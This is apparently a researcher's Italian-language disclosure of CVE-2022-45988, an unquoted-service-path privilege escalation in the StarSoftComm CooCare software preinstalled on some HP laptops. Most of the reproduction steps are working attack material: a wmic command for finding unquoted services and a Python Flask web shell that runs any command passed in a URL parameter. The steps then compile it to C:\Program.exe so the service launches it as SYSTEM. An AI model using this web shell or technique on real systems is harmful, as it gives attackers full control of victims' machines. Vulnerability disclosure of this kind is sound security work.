
CVE-2022-45988 StarSoftComm HP CooCare Esiste una vulnerabilità di elevazione dei privilegi
####################################################
Ho contattato hp-security-alert: hanno corretto questo bug. Riguardo a StarSoftComm CooCare [HP-PSRT-IR #4106]
Il fornitore ha risposto con le seguenti informazioni:
Segui questi passaggi per aggiornare:
#####################################
Esiste una vulnerabilità di elevazione dei privilegi in StarSoftComm HP CooCare che potrebbe consentire a un attaccante di elevare il proprio livello di privilegi. e管家超级版 è un software di diagnostica remota preinstallato su HP星14 pro; è un prodotto di StarSoftComm (软通科技).
testato su Windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 laptop da 14 pollici 14-eh0000 (56D77AV)
Versione interessata: CooCare precedente alla v5.364
#Riproduzione della vulnerabilità
#Il primo passo:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ trova il servizio (usa il comando CMD sopra per trovare il servizio non quotato)

Il nome del servizio è Windows Application Management Service = AKA = WinAppMgmt
Il nome del servizio è Windows Application Management Service, in breve WinAppMgmt.

Il servizio proviene da StarSoftComm CooCare

#Passo 2:Prepara un programma dannoso

from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') #Reception? cmd= parameter
a=os.popen(r[0]) #Execute system commands
l = a.read()
return l #return
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) #Listen HTTP port 14145
Stavo usando python3 flask per scrivere un exe dannoso. Può ascoltare sulla porta HTTP 14145 ed eseguire comandi di sistema.
Usando il comando pyinstaller.exe --onefile --windowed -F -w python_test.py si crea un exe dannoso.
#Passo 3:Metti il malware nel percorso C:\ e rinomina il malware in Program.exe

#Passo 4:Avvia il servizio Windows Application Management
Se il servizio Windows Application Management è già avviato, puoi riavviarlo

#Passo 5:Attendi l'avvio del servizio Windows Application Management ed esegui i comandi di sistema C:\Program.exe viene eseguito come SYSTEM.
Quando vedo che Windows Application Management Service risulta avviato in Taskmgr.exe come SYSTEM, posso aprire il browser e inserire http://127.0.0.1:14145?cmd=whoami
Aspetta..........
per...
questo.
NT SYSTEM
